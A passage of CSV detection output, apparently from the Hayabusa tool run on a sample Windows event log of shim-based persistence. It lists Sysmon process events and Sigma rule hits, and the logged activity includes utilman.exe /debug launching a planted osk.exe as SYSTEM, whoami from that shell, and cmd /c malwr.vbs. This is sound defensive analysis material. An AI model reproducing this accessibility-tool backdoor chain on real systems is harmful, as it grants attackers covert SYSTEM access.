Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2892 | PGUID: 365ABB72-57F4-5C91-0000-001083920900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:58:28.304 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3700 | PGUID: 365ABB72-57F4-5C91-0000-001070930900,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:58:28.815 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 2604 | PGUID: 365ABB72-57F4-5C91-0000-0010BB9C0900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:58:31.860 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\system32\utilman.exe | PID: 3204 | PGUID: 365ABB72-57F7-5C91-0000-001008B30900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:58:31.860 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3204 | PGUID: 365ABB72-57F7-5C91-0000-001008B30900,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:58:35.745 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""c:\osk.exe"" | Process: C:\osk.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: utilman.exe /debug | LID: 0x3e7 | PID: 2128 | PGUID: 365ABB72-57FB-5C91-0000-00104FD40900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""c:\osk.exe"" | LID: 0x3e7 | PID: 2456 | PGUID: 365ABB72-5804-5C91-0000-001044DE0900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Disc,Whoami Execution Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 06:00:01.518 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\wsqmcons.exe | Process: C:\Windows\System32\wsqmcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2772 | PGUID: 365ABB72-5851-5C91-0000-0010E1030A00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 06:00:01.539 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Process: C:\Windows\System32\schtasks.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\wsqmcons.exe | LID: 0x3e7 | PID: 2716 | PGUID: 365ABB72-5851-5C91-0000-00107D050A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 06:10:34.489 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 792 | PGUID: 365ABB72-5ACA-5C91-0000-0010DC1E0B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 06:18:54.257 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2884 | PGUID: 365ABB72-5CBE-5C91-0000-001017150C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 06:18:57.202 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3856 | PGUID: 365ABB72-5CC1-5C91-0000-0010DD2F0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 06:20:32.298 +09:00,PC01.example.corp,13,medium,Persis,Registry Modification to Hidden File Extension,,../hayabusa-rules/sigma/registry_event/win_re_hidden_extention.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 06:20:32.298 +09:00,PC01.example.corp,13,medium,Persis,Registry Modification to Hidden File Extension,,../hayabusa-rules/sigma/registry_event/win_re_hidden_extention.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 06:21:05.306 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 3568 | PGUID: 365ABB72-5D41-5C91-0000-0010D9080F00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 06:22:28.886 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | Process: C:\Windows\System32\rundll32.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3840 | PGUID: 365ABB72-5D94-5C91-0000-001080E90F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 06:22:33.593 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows NT\Accessories\WORDPAD.EXE"" ""C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb"" | Process: C:\Program Files\Windows NT\Accessories\wordpad.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | LID: 0x33435 | PID: 900 | PGUID: 365ABB72-5D99-5C91-0000-001051FA0F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 06:26:05.397 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2600 | PGUID: 365ABB72-5E6D-5C91-0000-001073BA1000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 06:26:08.852 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x33435 | PID: 2760 | PGUID: 365ABB72-5E70-5C91-0000-00107EBE1000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 06:31:05.509 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 572 | PGUID: 365ABB72-5F99-5C91-0000-0010B5421100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 06:36:05.610 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 1748 | PGUID: 365ABB72-60C5-5C91-0000-001061C31100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 06:41:05.702 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2400 | PGUID: 365ABB72-61F1-5C91-0000-0010554C1200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 06:41:11.440 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3364 | PGUID: 365ABB72-61F7-5C91-0000-001032511200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.EXE /c malwr.vbs | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x33435 | PID: 2340 | PGUID: 365ABB72-61FD-5C91-0000-0010536A1200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logoff | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x33435 | PID: 3668 | PGUID: 365ABB72-61FD-5C91-0000-0010E26A1200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 06:41:18.290 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x1 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 2952 | PGUID: 365ABB72-61FE-5C91-0000-001035771200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 06:41:18.410 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\servicing\TrustedInstaller.exe | Process: C:\Windows\servicing\TrustedInstaller.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1892 | PGUID: 365ABB72-61FE-5C91-0000-0010DF7F1200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:49.576 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 360 | PGUID: 365ABB72-777E-5C91-0000-00102B4B0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:49.856 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 368 | PGUID: 365ABB72-777E-5C91-0000-0010864D0000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:50.157 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 408 | PGUID: 365ABB72-777F-5C91-0000-00105E500000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 416 | PGUID: 365ABB72-777F-5C91-0000-001079500000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 428 | PGUID: 365ABB72-777F-5C91-0000-0010BF500000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:50.387 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 456 | PGUID: 365ABB72-777F-5C91-0000-0010D8520000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:50.427 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 516 | PGUID: 365ABB72-777F-5C91-0000-00100B590000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:50.467 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 524 | PGUID: 365ABB72-777F-5C91-0000-0010B95B0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:50.497 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsm.exe | Process: C:\Windows\System32\lsm.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 532 | PGUID: 365ABB72-777F-5C91-0000-0010EA5B0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:51.308 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 640 | PGUID: 365ABB72-7780-5C91-0000-00103C730000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:51.599 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\VBoxService.exe | Process: C:\Windows\System32\VBoxService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 704 | PGUID: 365ABB72-7780-5C91-0000-0010CFB00000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:51.679 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 904 | PGUID: 365ABB72-7781-5C91-0000-001040B90000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:51.789 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1016 | PGUID: 365ABB72-7781-5C91-0000-001036CB0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:53.111 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1140 | PGUID: 365ABB72-7782-5C91-0000-00102D0B0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:53.501 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Tasks\SA.DAT | Process: C:\Windows\system32\svchost.exe | PID: 1040 | PGUID: 365ABB72-7781-5C91-0000-0010C2CC0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:53.571 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\spoolsv.exe | Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1412 | PGUID: 365ABB72-7783-5C91-0000-0010DB2C0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1536 | PGUID: 365ABB72-7783-5C91-0000-001025410100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:54.102 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Startup | Process: C:\Windows\System32\gpscript.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x3e7 | PID: 1616 | PGUID: 365ABB72-7794-5C91-0000-0010DF510100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1628 | PGUID: 365ABB72-77A2-5C91-0000-00106D560100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-77A2-5C91-0000-00100A570100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1676 | PGUID: 365ABB72-77A2-5C91-0000-001006590100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:54.593 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1788 | PGUID: 365ABB72-77C0-5C91-0000-001044720100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1820 | PGUID: 